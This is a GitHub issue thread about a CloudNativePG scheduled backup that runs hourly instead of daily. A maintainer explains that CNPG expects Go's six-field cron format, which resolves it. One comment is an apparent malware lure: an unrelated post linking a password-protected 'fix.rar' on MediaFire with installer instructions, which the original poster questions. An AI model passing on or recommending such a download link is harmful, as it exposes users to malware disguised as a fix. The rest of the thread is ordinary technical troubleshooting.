### ISSUE TITLE
[question]: Cloudnative pg backup schedule triggering outside of defined schedule

### ISSUE THREAD

**Issue by wesbragagt** [Panfactum/stack#120]
### Prior Search

- [X] I have already searched this [project's issues](https://github.com/Panfactum/stack/issues) to determine if a similar question has already been asked.

### What is your question?

In my db cluster I have set for backups to run daily at 7am UTC however I'm noticing that they are getting triggered on a hourly basis. Is there another area of the stack that I can check this definition? Or something else that could be causing this? Am I off by a digit on the cron?

For context it's 11:30am CST for me.

```
Name:         pg-88cc-default
Namespace:    implentio
Labels:       <none>
Annotations:  <none>
API Version:  postgresql.cnpg.io/v1
Kind:         ScheduledBackup
Metadata:
  Creation Timestamp:  2024-08-23T06:47:40Z
  Generation:          1
  Resource Version:    67537141
  UID:                 0043e2f0-e1ee-42da-8f89-98b22692b084
Spec:
  Backup Owner Reference:  cluster
  Cluster:
    Name:    pg-88cc
  Method:    barmanObjectStore
  Schedule:  0 7 * * *
Status:
  Last Check Time:     2024-08-26T16:07:00Z
  Last Schedule Time:  2024-08-26T16:07:00Z
  Next Schedule Time:  2024-08-26T17:07:00Z
Events:
  Type    Reason          Age   From                            Message
  ----    ------          ----  ----                            -------
  Normal  BackupSchedule  19m   cloudnative-pg-scheduledbackup  Next backup scheduled by 2024-08-26 17:07:00 +0000 UTC
```

### What primary components of the stack does this relate to?

terraform

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by wesbragagt** [comment]
@Saschl how is this related to the problem? Could you clarify the recommendation?

**Comment by fullykubed** [comment]
@wesbragagt I believe that this is because you are the wrong cron expression format provided.

Specifically, CNPG uses Go's cron format, not linux's. See the docs [here](https://cloudnative-pg.io/documentation/current/backup/#scheduled-backups).

**Comment by fullykubed** [comment]
We should probably add a validator for that on our end as it appears that CNPG does not provide one.

**Comment by wesbragagt** [comment]
Understood, yeah it would be a good add. I'm unblocked. Thank you.
